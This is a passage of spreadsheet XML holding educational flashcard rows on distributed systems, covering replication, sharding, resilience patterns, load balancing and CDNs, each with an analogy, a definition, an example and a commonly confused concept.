          <t>Write to primary at t=0; replica applies at t=2s; a read at t=1s from the replica misses your write</t>
        </is>
      </c>
      <c r="G864" t="inlineStr">
        <is>
          <t>Cache staleness — an expired copy knowingly served; lag is the replica genuinely not having caught up yet.</t>
        </is>
      </c>
      <c r="H864" t="inlineStr">
        <is>
          <t>Live TV broadcast delay</t>
        </is>
      </c>
      <c r="J864" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K864" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" t="n">
        <v>0</v>
      </c>
      <c r="B865" t="inlineStr">
        <is>
          <t>863</t>
        </is>
      </c>
      <c r="C865" t="inlineStr">
        <is>
          <t>Read-your-writes consistency</t>
        </is>
      </c>
      <c r="D865" t="inlineStr">
        <is>
          <t>You pin a note to the office board, blink, and it's gone — the janitor swapped in yesterday's photo of the board. RYW law: after YOU pin, you're shown the real board.</t>
        </is>
      </c>
      <c r="E865" t="inlineStr">
        <is>
          <t>A guarantee that a user always sees their own writes — route their reads to the leader or a caught-up replica for a window after writing.</t>
        </is>
      </c>
      <c r="F865" t="inlineStr">
        <is>
          <t>After POST /comments, read from the primary for 10s, or require replica LSN &gt;= your write's LSN</t>
        </is>
      </c>
      <c r="G865" t="inlineStr">
        <is>
          <t>Strong consistency for everyone — RYW only guarantees the writer sees their write; other users may still lag.</t>
        </is>
      </c>
      <c r="H865" t="inlineStr">
        <is>
          <t>Mirror showing your old haircut</t>
        </is>
      </c>
      <c r="J865" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K865" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" t="n">
        <v>0</v>
      </c>
      <c r="B866" t="inlineStr">
        <is>
          <t>864</t>
        </is>
      </c>
      <c r="C866" t="inlineStr">
        <is>
          <t>Quorums (W+R&gt;N)</t>
        </is>
      </c>
      <c r="D866" t="inlineStr">
        <is>
          <t>Nine safety-deposit boxes: you drop the updated deed into five (W=5) and later open any five (R=5) — pigeonhole gods guarantee one box in your handful holds the newest deed.</t>
        </is>
      </c>
      <c r="E866" t="inlineStr">
        <is>
          <t>With N replicas, writes acked by W and reads querying R overlap when W+R&gt;N, so every read touches at least one up-to-date copy.</t>
        </is>
      </c>
      <c r="F866" t="inlineStr">
        <is>
          <t>N=3, W=2, R=2: 2+2&gt;3 so reads overlap writes; W=1,R=1 is fast but can read stale</t>
        </is>
      </c>
      <c r="G866" t="inlineStr">
        <is>
          <t>Majority quorum in consensus — for electing and committing; read/write quorums tune per-operation consistency in Dynamo-style stores.</t>
        </is>
      </c>
      <c r="H866" t="inlineStr">
        <is>
          <t>Venn diagram forced to overlap</t>
        </is>
      </c>
      <c r="J866" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K866" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" t="n">
        <v>0</v>
      </c>
      <c r="B867" t="inlineStr">
        <is>
          <t>865</t>
        </is>
      </c>
      <c r="C867" t="inlineStr">
        <is>
          <t>Sharding</t>
        </is>
      </c>
      <c r="D867" t="inlineStr">
        <is>
          <t>An encyclopedia too heavy for any shelf, sawed into A-F, G-M, N-Z volumes across three rooms — one entry is a quick fetch; 'every word with vowels' means visiting all rooms.</t>
        </is>
      </c>
      <c r="E867" t="inlineStr">
        <is>
          <t>Split data horizontally across nodes by a partition key so each shard holds a subset — capacity scales, but cross-shard queries get hard.</t>
        </is>
      </c>
      <c r="F867" t="inlineStr">
        <is>
          <t>users sharded by user_id % 8 across 8 databases; a JOIN across shards becomes app-level scatter-gather</t>
        </is>
      </c>
      <c r="G867" t="inlineStr">
        <is>
          <t>Replication — copies of the SAME data for safety and reads; sharding is DIFFERENT slices for capacity.</t>
        </is>
      </c>
      <c r="H867" t="inlineStr">
        <is>
          <t>Pizza cut among roommates</t>
        </is>
      </c>
      <c r="J867" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K867" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" t="n">
        <v>0</v>
      </c>
      <c r="B868" t="inlineStr">
        <is>
          <t>866</t>
        </is>
      </c>
      <c r="C868" t="inlineStr">
        <is>
          <t>Range sharding</t>
        </is>
      </c>
      <c r="D868" t="inlineStr">
        <is>
          <t>Filing cabinets labeled by alphabet span; the '2024-01' drawer glows red-hot because every new timestamped file crams into it while older drawers gather dust.</t>
        </is>
      </c>
      <c r="E868" t="inlineStr">
        <is>
          <t>Partition by key ranges (A-F, G-M, ...) keeping sort order — efficient range scans, but sequential keys hammer one shard.</t>
        </is>
      </c>
      <c r="F868" t="inlineStr">
        <is>
          <t>HBase/Bigtable regions split by row-key range; timestamp keys mean all writes hit the newest region</t>
        </is>
      </c>
      <c r="G868" t="inlineStr">
        <is>
          <t>Hash sharding — spreads load evenly but shreds ordering; range keeps neighbors together at hotspot risk.</t>
        </is>
      </c>
      <c r="H868" t="inlineStr">
        <is>
          <t>Library stacks by call number</t>
        </is>
      </c>
      <c r="J868" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K868" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" t="n">
        <v>0</v>
      </c>
      <c r="B869" t="inlineStr">
        <is>
          <t>867</t>
        </is>
      </c>
      <c r="C869" t="inlineStr">
        <is>
          <t>Hash sharding</t>
        </is>
      </c>
      <c r="D869" t="inlineStr">
        <is>
          <t>A confetti cannon firing files into numbered bins by a die roll seeded on the filename: bins fill perfectly evenly, but 'give me A through C' means digging through all of them.</t>
        </is>
      </c>
      <c r="E869" t="inlineStr">
        <is>
          <t>Route each key by hash(key) mod shards for uniform spread — hotspots vanish, but range queries must fan out to every shard.</t>
        </is>
      </c>
      <c r="F869" t="inlineStr">
        <is>
          <t>shard = crc32(user_id) % 16; 'users created this week' must query all 16 shards</t>
        </is>
      </c>
      <c r="G869" t="inlineStr">
        <is>
          <t>Range sharding — preserves order for scans; hashing trades scans for even load.</t>
        </is>
      </c>
      <c r="H869" t="inlineStr">
        <is>
          <t>Card dealer distributing by shuffle</t>
        </is>
      </c>
      <c r="J869" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K869" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" t="n">
        <v>0</v>
      </c>
      <c r="B870" t="inlineStr">
        <is>
          <t>868</t>
        </is>
      </c>
      <c r="C870" t="inlineStr">
        <is>
          <t>Consistent hashing</t>
        </is>
      </c>
      <c r="D870" t="inlineStr">
        <is>
          <t>Guests around a circular table each grabbing the plate to their right: one guest leaves and only her neighbor picks up extra plates — nobody else moves. With mod-N, the whole table reshuffles.</t>
        </is>
      </c>
      <c r="E870" t="inlineStr">
        <is>
          <t>Keys and nodes hash onto a ring; each key belongs to the next node clockwise, so adding or removing a node remaps only ~1/N of keys.</t>
        </is>
      </c>
      <c r="F870" t="inlineStr">
        <is>
          <t>Cassandra/DynamoDB token rings with virtual nodes; memcached ketama client hashing</t>
        </is>
      </c>
      <c r="G870" t="inlineStr">
        <is>
          <t>hash mod N — one node change remaps nearly ALL keys; the ring localizes churn to neighbors.</t>
        </is>
      </c>
      <c r="H870" t="inlineStr">
        <is>
          <t>Clock face with sliding hour marks</t>
        </is>
      </c>
      <c r="J870" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K870" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" t="n">
        <v>0</v>
      </c>
      <c r="B871" t="inlineStr">
        <is>
          <t>869</t>
        </is>
      </c>
      <c r="C871" t="inlineStr">
        <is>
          <t>Hot partitions</t>
        </is>
      </c>
      <c r="D871" t="inlineStr">
        <is>
          <t>Twenty ticket windows, but Beyonce fans mob window 7 into meltdown while nineteen clerks nap — stapling random digits to her name (salting) splits the mob.</t>
        </is>
      </c>
      <c r="E871" t="inlineStr">
        <is>
          <t>Skewed keys (a celebrity, one tenant, today's date) overload a single shard while siblings idle — fix with key salting, splitting, or caching.</t>
        </is>
      </c>
      <c r="F871" t="inlineStr">
        <is>
          <t>Fan-out for a 100M-follower account melts its partition; fix: key + random suffix 0-9 spreads it over 10</t>
        </is>
      </c>
      <c r="G871" t="inlineStr">
        <is>
          <t>General overload — all partitions hot means scale out; a hot partition is skew that more shards alone won't fix.</t>
        </is>
      </c>
      <c r="H871" t="inlineStr">
        <is>
          <t>One slot machine everyone believes is lucky</t>
        </is>
      </c>
      <c r="J871" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K871" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" t="n">
        <v>0</v>
      </c>
      <c r="B872" t="inlineStr">
        <is>
          <t>870</t>
        </is>
      </c>
      <c r="C872" t="inlineStr">
        <is>
          <t>Timeouts everywhere</t>
        </is>
      </c>
      <c r="D872" t="inlineStr">
        <is>
          <t>A diner with no rule for abandoned tables: ghosts who never order occupy every chair, and paying customers queue into the street — the kitchen starved by silence.</t>
        </is>
      </c>
      <c r="E872" t="inlineStr">
        <is>
          <t>Every remote call needs a deadline; without one, a hung dependency silently eats threads and connections until your own service dies.</t>
        </is>
      </c>
      <c r="F872" t="inlineStr">
        <is>
          <t>connect timeout 1s, request timeout 5s; the 'infinite' default in many HTTP clients is the real killer</t>
        </is>
      </c>
      <c r="G872" t="inlineStr">
        <is>
          <t>Retries — what to do AFTER a timeout; the timeout itself is the precondition that frees the resource.</t>
        </is>
      </c>
      <c r="H872" t="inlineStr">
        <is>
          <t>Chess clock that forfeits stalled players</t>
        </is>
      </c>
      <c r="J872" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K872" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" t="n">
        <v>0</v>
      </c>
      <c r="B873" t="inlineStr">
        <is>
          <t>871</t>
        </is>
      </c>
      <c r="C873" t="inlineStr">
        <is>
          <t>Retries for transient faults</t>
        </is>
      </c>
      <c r="D873" t="inlineStr">
        <is>
          <t>Knocking again when a door didn't open — fine at a friend's house; catastrophic at a cashier who may have already charged your card behind the glass.</t>
        </is>
      </c>
      <c r="E873" t="inlineStr">
        <is>
          <t>Re-attempt failed calls to ride out blips — but only retry idempotent operations or you duplicate effects, and always cap attempts.</t>
        </is>
      </c>
      <c r="F873" t="inlineStr">
        <is>
          <t>Retry GET/PUT on 503 up to 3 times; never blind-retry POST /charge without an idempotency key</t>
        </is>
      </c>
      <c r="G873" t="inlineStr">
        <is>
          <t>Retrying 4xx — client errors won't heal by repetition; retry only transient faults (timeouts, 429 after waiting, 5xx).</t>
        </is>
      </c>
      <c r="H873" t="inlineStr">
        <is>
          <t>Redialing a dropped call</t>
        </is>
      </c>
      <c r="J873" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K873" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" t="n">
        <v>0</v>
      </c>
      <c r="B874" t="inlineStr">
        <is>
          <t>872</t>
        </is>
      </c>
      <c r="C874" t="inlineStr">
        <is>
          <t>Exponential backoff + jitter</t>
        </is>
      </c>
      <c r="D874" t="inlineStr">
        <is>
          <t>After a fire alarm, the whole office counting 'ten... nine...' in unison would jam the door again — so each person rolls dice for when to walk back in.</t>
        </is>
      </c>
      <c r="E874" t="inlineStr">
        <is>
          <t>Wait 1s, 2s, 4s... between retries and add randomness so a thousand failed clients don't re-stampede the recovering server in sync.</t>
        </is>
      </c>
      <c r="F874" t="inlineStr">
        <is>
          <t>sleep = random(0, min(cap, base * 2^attempt)) — 'full jitter' per the AWS architecture blog</t>
        </is>
      </c>
      <c r="G874" t="inlineStr">
        <is>
          <t>Fixed-interval retry — synchronized waves that DDoS your own dependency the moment it lifts its head.</t>
        </is>
      </c>
      <c r="H874" t="inlineStr">
        <is>
          <t>Coughing crowd re-entering a theater one by one</t>
        </is>
      </c>
      <c r="J874" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K874" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" t="n">
        <v>0</v>
      </c>
      <c r="B875" t="inlineStr">
        <is>
          <t>873</t>
        </is>
      </c>
      <c r="C875" t="inlineStr">
        <is>
          <t>Idempotency keys</t>
        </is>
      </c>
      <c r="D875" t="inlineStr">
        <is>
          <t>A raffle counter checking name-tagged stubs: stuff the box twice and the counter shrugs — 'already have Anthony's stub' — and hands back the very same prize.</t>
        </is>
      </c>
      <c r="E875" t="inlineStr">
        <is>
          <t>The client sends a unique key per logical operation; the server stores the first result and replays it for duplicates — retries become safe.</t>
        </is>
      </c>
      <c r="F875" t="inlineStr">
        <is>
          <t>POST /charges with Idempotency-Key: ord-7f3a; timeout, retry same key, same single charge — never two</t>
        </is>
      </c>
      <c r="G875" t="inlineStr">
        <is>
          <t>Idempotent HTTP methods — a property of the verb's semantics; idempotency keys retrofit that safety onto POST.</t>
        </is>
      </c>
      <c r="H875" t="inlineStr">
        <is>
          <t>Ticket stub marked 'admit one, re-shows ok'</t>
        </is>
      </c>
      <c r="J875" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K875" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" t="n">
        <v>0</v>
      </c>
      <c r="B876" t="inlineStr">
        <is>
          <t>874</t>
        </is>
      </c>
      <c r="C876" t="inlineStr">
        <is>
          <t>Circuit breaker</t>
        </is>
      </c>
      <c r="D876" t="inlineStr">
        <is>
          <t>The fuse box in your wall: the toaster shorts, the breaker snaps OFF so the house doesn't burn; later you flick it halfway and listen for sizzling before restoring power.</t>
        </is>
      </c>
      <c r="E876" t="inlineStr">
        <is>
          <t>After enough consecutive failures the breaker opens and fails calls instantly; after a cool-down, half-open trial requests test recovery.</t>
        </is>
      </c>
      <c r="F876" t="inlineStr">
        <is>
          <t>5 failures in 10s opens for 30s (instant 503s, zero calls); half-open lets 1 probe through; success closes</t>
        </is>
      </c>
      <c r="G876" t="inlineStr">
        <is>
          <t>Retry — keeps hammering a failing dependency; the breaker's whole point is to STOP calling and fail fast.</t>
        </is>
      </c>
      <c r="H876" t="inlineStr">
        <is>
          <t>Boxing referee's standing eight-count</t>
        </is>
      </c>
      <c r="J876" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K876" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" t="n">
        <v>0</v>
      </c>
      <c r="B877" t="inlineStr">
        <is>
          <t>875</t>
        </is>
      </c>
      <c r="C877" t="inlineStr">
        <is>
          <t>Bulkhead</t>
        </is>
      </c>
      <c r="D877" t="inlineStr">
        <is>
          <t>A ship's hold divided by steel walls: the torpedoed compartment floods to the ceiling while sailors in the next one stay dry and keep stoking the engines.</t>
        </is>
      </c>
      <c r="E877" t="inlineStr">
        <is>
          <t>Partition resources (thread pools, connections) per dependency so one drowning downstream cannot sink the whole service — ship-compartment style.</t>
        </is>
      </c>
      <c r="F877" t="inlineStr">
        <is>
          <t>10 threads reserved for the payment API, 10 for search: payments hang, search still answers</t>
        </is>
      </c>
      <c r="G877" t="inlineStr">
        <is>
          <t>Circuit breaker — trips on failures over time; bulkheads statically cap blast radius before anything fails.</t>
        </is>
      </c>
      <c r="H877" t="inlineStr">
        <is>
          <t>Ice cube tray containing a spill</t>
        </is>
      </c>
      <c r="J877" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K877" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" t="n">
        <v>0</v>
      </c>
      <c r="B878" t="inlineStr">
        <is>
          <t>876</t>
        </is>
      </c>
      <c r="C878" t="inlineStr">
        <is>
          <t>Graceful degradation</t>
        </is>
      </c>
      <c r="D878" t="inlineStr">
        <is>
          <t>A restaurant out of gas: the kitchen serves cold cuts and salads by candlelight rather than bolting the doors — diners eat, just humbler.</t>
        </is>
      </c>
      <c r="E878" t="inlineStr">
        <is>
          <t>When a dependency fails, serve a reduced but working experience — cached data, defaults, hidden features — instead of a whole-page error.</t>
        </is>
      </c>
      <c r="F878" t="inlineStr">
        <is>
          <t>Recommendations down: show bestsellers; avatar service down: initials in a colored circle</t>
        </is>
      </c>
      <c r="G878" t="inlineStr">
        <is>
          <t>Failover — replaces the failed component with a spare; degradation accepts the loss and trims the product.</t>
        </is>
      </c>
      <c r="H878" t="inlineStr">
        <is>
          <t>Limp mode in a car</t>
        </is>
      </c>
      <c r="J878" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K878" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" t="n">
        <v>0</v>
      </c>
      <c r="B879" t="inlineStr">
        <is>
          <t>877</t>
        </is>
      </c>
      <c r="C879" t="inlineStr">
        <is>
          <t>Backpressure</t>
        </is>
      </c>
      <c r="D879" t="inlineStr">
        <is>
          <t>A sushi conveyor where the chef watches the belt: plates pile up in front of a slow eater and the chef stops cutting — no plate ever avalanches to the floor.</t>
        </is>
      </c>
      <c r="E879" t="inlineStr">
        <is>
          <t>Consumers signal or enforce their capacity upstream so producers slow down, instead of buffering unboundedly until memory dies.</t>
        </is>
      </c>
      <c r="F879" t="inlineStr">
        <is>
          <t>TCP rwnd, Reactive Streams request(n), Kafka poll pacing, bounded queues that block producers</t>
        </is>
      </c>
      <c r="G879" t="inlineStr">
        <is>
          <t>Load shedding — dropping excess work at the door; backpressure instead asks the source to slow down.</t>
        </is>
      </c>
      <c r="H879" t="inlineStr">
        <is>
          <t>Clothespin pinching a garden hose</t>
        </is>
      </c>
      <c r="J879" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K879" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" t="n">
        <v>0</v>
      </c>
      <c r="B880" t="inlineStr">
        <is>
          <t>878</t>
        </is>
      </c>
      <c r="C880" t="inlineStr">
        <is>
          <t>Load shedding</t>
        </is>
      </c>
      <c r="D880" t="inlineStr">
        <is>
          <t>A sinking hot-air balloon crew hurling sandbags — and the gift-shop cargo — overboard so the basket with passengers clears the mountain ridge.</t>
        </is>
      </c>
      <c r="E880" t="inlineStr">
        <is>
          <t>Under overload, deliberately reject low-priority work fast (429/503) so remaining capacity keeps serving what matters most.</t>
        </is>
      </c>
      <c r="F880" t="inlineStr">
        <is>
          <t>At 90% CPU return 429 to anonymous traffic, keep checkout flows; 5% errors beat 100% meltdown</t>
        </is>
      </c>
      <c r="G880" t="inlineStr">
        <is>
          <t>Rate limiting — per-client fairness enforced always; shedding is global triage only during overload.</t>
        </is>
      </c>
      <c r="H880" t="inlineStr">
        <is>
          <t>Nightclub one-in-one-out policy</t>
        </is>
      </c>
      <c r="J880" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K880" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" t="n">
        <v>0</v>
      </c>
      <c r="B881" t="inlineStr">
        <is>
          <t>879</t>
        </is>
      </c>
      <c r="C881" t="inlineStr">
        <is>
          <t>Retry storms &amp; thundering herd</t>
        </is>
      </c>
      <c r="D881" t="inlineStr">
        <is>
          <t>A vending machine eats one coin and the entire stadium queues up to kick it simultaneously — the machine, nearly fixed, is now flattened against the wall.</t>
        </is>
      </c>
      <c r="E881" t="inlineStr">
        <is>
          <t>Synchronized retries or one expired hot cache key stampede a struggling backend, turning a blip into an outage — jitter, caps, and coalescing calm it.</t>
        </is>
      </c>
      <c r="F881" t="inlineStr">
        <is>
          <t>Homepage cache key expires; 10k requests miss at once and hit the DB; fix: request coalescing, jittered TTLs</t>
        </is>
      </c>
      <c r="G881" t="inlineStr">
        <is>
          <t>Ordinary traffic spike — organic demand; a herd is self-inflicted synchronization of your own clients and retries.</t>
        </is>
      </c>
      <c r="H881" t="inlineStr">
        <is>
          <t>Everyone refreshing at the stroke of ticket release</t>
        </is>
      </c>
      <c r="J881" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K881" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" t="n">
        <v>0</v>
      </c>
      <c r="B882" t="inlineStr">
        <is>
          <t>880</t>
        </is>
      </c>
      <c r="C882" t="inlineStr">
        <is>
          <t>Vertical vs horizontal scaling</t>
        </is>
      </c>
      <c r="D882" t="inlineStr">
        <is>
          <t>Grace Hopper's farm: don't breed a bigger ox — hitch up 1024 chickens, then spend the rest of your days herding chickens.</t>
        </is>
      </c>
      <c r="E882" t="inlineStr">
        <is>
          <t>Scale up buys a bigger machine (simple, ceiling-bound); scale out adds more machines (no ceiling, but coordination becomes your problem).</t>
        </is>
      </c>
      <c r="F882" t="inlineStr">
        <is>
          <t>Up: db.r5.large to db.r5.24xlarge; Out: 3 app servers to 30 behind a load balancer</t>
        </is>
      </c>
      <c r="G882" t="inlineStr">
        <is>
          <t>Stateless vs stateful scale-out — stateless multiplies trivially; databases scale out only via sharding/replication pain.</t>
        </is>
      </c>
      <c r="H882" t="inlineStr">
        <is>
          <t>Bigger pizza vs more pizzas</t>
        </is>
      </c>
      <c r="J882" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K882" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" t="n">
        <v>0</v>
      </c>
      <c r="B883" t="inlineStr">
        <is>
          <t>881</t>
        </is>
      </c>
      <c r="C883" t="inlineStr">
        <is>
          <t>Stateless services scale</t>
        </is>
      </c>
      <c r="D883" t="inlineStr">
        <is>
          <t>Fast-food cashiers who are all literally the same cloned person: any till, any customer, mid-order swap — nobody notices, because the order lives on the ticket, not in a head.</t>
        </is>
      </c>
      <c r="E883" t="inlineStr">
        <is>
          <t>Servers keeping no local session state are interchangeable: any instance serves any request, so you add clones and kill them freely.</t>
        </is>
      </c>
      <c r="F883" t="inlineStr">
        <is>
          <t>Sessions in Redis or JWTs, files in S3; kubectl scale deploy web --replicas=50 just works</t>
        </is>
      </c>
      <c r="G883" t="inlineStr">
        <is>
          <t>Stateless protocol (HTTP) — a protocol property; here it's the SERVER holding no per-user state between requests.</t>
        </is>
      </c>
      <c r="H883" t="inlineStr">
        <is>
          <t>Interchangeable Lego bricks</t>
        </is>
      </c>
      <c r="J883" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K883" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" t="n">
        <v>0</v>
      </c>
      <c r="B884" t="inlineStr">
        <is>
          <t>882</t>
        </is>
      </c>
      <c r="C884" t="inlineStr">
        <is>
          <t>Load balancer</t>
        </is>
      </c>
      <c r="D884" t="inlineStr">
        <is>
          <t>A maitre d' at a food court glancing at every kitchen's queue and pointing each arriving diner to a counter — diners believe there's one restaurant.</t>
        </is>
      </c>
      <c r="E884" t="inlineStr">
        <is>
          <t>A front door distributing requests across healthy backends, hiding how many exist — L4 balances connections, L7 routes on HTTP content.</t>
        </is>
      </c>
      <c r="F884" t="inlineStr">
        <is>
          <t>nginx upstream { server app1; server app2; }; AWS ALB is L7, NLB is L4</t>
        </is>
      </c>
      <c r="G884" t="inlineStr">
        <is>
          <t>Reverse proxy — the same seat at the door; 'load balancer' emphasizes distribution across many backends.</t>
        </is>
      </c>
      <c r="H884" t="inlineStr">
        <is>
          <t>Air traffic control tower</t>
        </is>
      </c>
      <c r="J884" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K884" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" t="n">
        <v>0</v>
      </c>
      <c r="B885" t="inlineStr">
        <is>
          <t>883</t>
        </is>
      </c>
      <c r="C885" t="inlineStr">
        <is>
          <t>Load-balancing algorithms</t>
        </is>
      </c>
      <c r="D885" t="inlineStr">
        <is>
          <t>Three casino dealers: one deals strictly clockwise (round robin), one always serves the emptiest table (least-conn), one seats each regular at 'their' table forever (hash).</t>
        </is>
      </c>
      <c r="E885" t="inlineStr">
        <is>
          <t>Round robin rotates evenly; least-connections favors the idlest backend; consistent hashing pins a key to a server for cache affinity.</t>
        </is>
      </c>
      <c r="F885" t="inlineStr">
        <is>
          <t>nginx: least_conn; or hash $request_uri consistent; plain RR suffers when request costs vary wildly</t>
        </is>
      </c>
      <c r="G885" t="inlineStr">
        <is>
          <t>Sticky sessions — a routing constraint bolted onto any algorithm, not an algorithm itself.</t>
        </is>
      </c>
      <c r="H885" t="inlineStr">
        <is>
          <t>Toll-booth lane picking strategies</t>
        </is>
      </c>
      <c r="J885" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K885" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" t="n">
        <v>0</v>
      </c>
      <c r="B886" t="inlineStr">
        <is>
          <t>884</t>
        </is>
      </c>
      <c r="C886" t="inlineStr">
        <is>
          <t>Sticky sessions smell</t>
        </is>
      </c>
      <c r="D886" t="inlineStr">
        <is>
          <t>A hair salon where your file lives in one stylist's drawer: her queue snakes out the door while others idle, and when she's sick your history is locked in.</t>
        </is>
      </c>
      <c r="E886" t="inlineStr">
        <is>
          <t>Pinning users to the server holding their session breaks even balancing, autoscaling, and painless deploys — externalize the state instead.</t>
        </is>
      </c>
      <c r="F886" t="inlineStr">
        <is>
          <t>LB cookie pins users to app3; app3 dies and they're all logged out; fix: sessions in Redis</t>
        </is>
      </c>
      <c r="G886" t="inlineStr">
        <is>
          <t>Cache affinity via consistent hashing — a deliberate performance choice; stickiness papers over state that shouldn't be local.</t>
        </is>
      </c>
      <c r="H886" t="inlineStr">
        <is>
          <t>Gym locker with your gear at one branch</t>
        </is>
      </c>
      <c r="J886" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K886" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" t="n">
        <v>0</v>
      </c>
      <c r="B887" t="inlineStr">
        <is>
          <t>885</t>
        </is>
      </c>
      <c r="C887" t="inlineStr">
        <is>
          <t>Load balancer health probes</t>
        </is>
      </c>
      <c r="D887" t="inlineStr">
        <is>
          <t>A stage manager peeking into each dressing room before curtain: actor unconscious — call medics (liveness); actor alive but half-dressed — hold their entrance (readiness).</t>
        </is>
      </c>
      <c r="E887" t="inlineStr">
        <is>
          <t>The balancer or orchestrator probes each instance — liveness (restart me) vs readiness (don't route to me) — and pulls failures from rotation.</t>
        </is>
      </c>
      <c r="F887" t="inlineStr">
        <is>
          <t>GET /healthz must return 200 in 2s; k8s readinessProbe gates traffic, livenessProbe restarts the pod</t>
        </is>
      </c>
      <c r="G887" t="inlineStr">
        <is>
          <t>Heartbeats — the node announces its own liveness; health checks are the platform actively probing it. | cf. 996 Health checks (déjà pris): 885 is the balancer's routing decision; 996 the endpoint your service exposes</t>
        </is>
      </c>
      <c r="H887" t="inlineStr">
        <is>
          <t>Coal-mine canary rounds</t>
        </is>
      </c>
      <c r="J887" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K887" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" t="n">
        <v>0</v>
      </c>
      <c r="B888" t="inlineStr">
        <is>
          <t>886</t>
        </is>
      </c>
      <c r="C888" t="inlineStr">
        <is>
          <t>CDN</t>
        </is>
      </c>
      <c r="D888" t="inlineStr">
        <is>
          <t>Instead of one bakery in Ohio shipping every croissant worldwide, identical corner bakeries in every city bake from the master recipe — your croissant is always warm and local.</t>
        </is>
      </c>
      <c r="E888" t="inlineStr">
        <is>
          <t>A geographically spread cache network serving content from a PoP near the user — origin offload plus latency cut against the speed of light.</t>
        </is>
      </c>
      <c r="F888" t="inlineStr">
        <is>
          <t>Cloudflare/CloudFront: a user in Tokyo gets app.js from the Tokyo PoP in 12ms instead of 180ms from origin</t>
        </is>
      </c>
      <c r="G888" t="inlineStr">
        <is>
          <t>Anycast/geo load balancing — routes you to a nearby region; the CDN also stores the content there.</t>
        </is>
      </c>
